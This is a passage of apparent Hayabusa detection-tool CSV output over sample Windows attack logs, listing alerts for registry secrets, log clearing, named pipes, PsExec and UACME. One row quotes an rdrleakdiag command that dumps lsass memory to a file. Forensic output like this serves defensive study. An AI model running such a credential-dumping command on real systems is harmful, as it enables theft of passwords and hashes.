83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx +2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: 
Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 
01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | 
PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 
747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 
747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: 
C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: 
BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: 
C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious 
Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx +2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx +2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 